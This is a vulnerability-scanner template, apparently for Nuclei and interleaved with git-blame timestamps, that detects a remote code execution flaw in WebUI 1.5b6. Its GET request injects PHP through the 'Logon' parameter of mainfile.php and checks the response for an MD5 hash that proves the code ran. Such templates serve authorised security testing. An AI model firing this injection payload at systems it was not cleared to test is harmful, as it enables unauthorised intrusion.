2021-02-19 08:21:21 +00:00
id : webui-rce
2022-04-22 10:38:41 +00:00
2021-02-19 07:39:32 +00:00
info :
2022-06-03 19:12:31 +00:00
name : WebUI 1.5b6 - Remote Code Execution
2021-02-19 07:39:32 +00:00
author : pikpikcu
severity : critical
2022-06-03 19:12:31 +00:00
description : WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/36821
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-08-27 04:41:18 +00:00
tags : webui,rce,edb
2021-02-19 08:21:21 +00:00
2021-02-19 07:39:32 +00:00
requests :
- method : GET
path :
2021-02-19 08:21:21 +00:00
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
2021-02-19 07:39:32 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-02-19 08:21:21 +00:00
- "c5b3d7397a90f42d222f7ed9408c0dc6"
2021-02-19 07:39:32 +00:00
part : body
- type : status
status :
2022-06-03 19:12:31 +00:00
- 200
# Enhanced by mp on 2022/06/03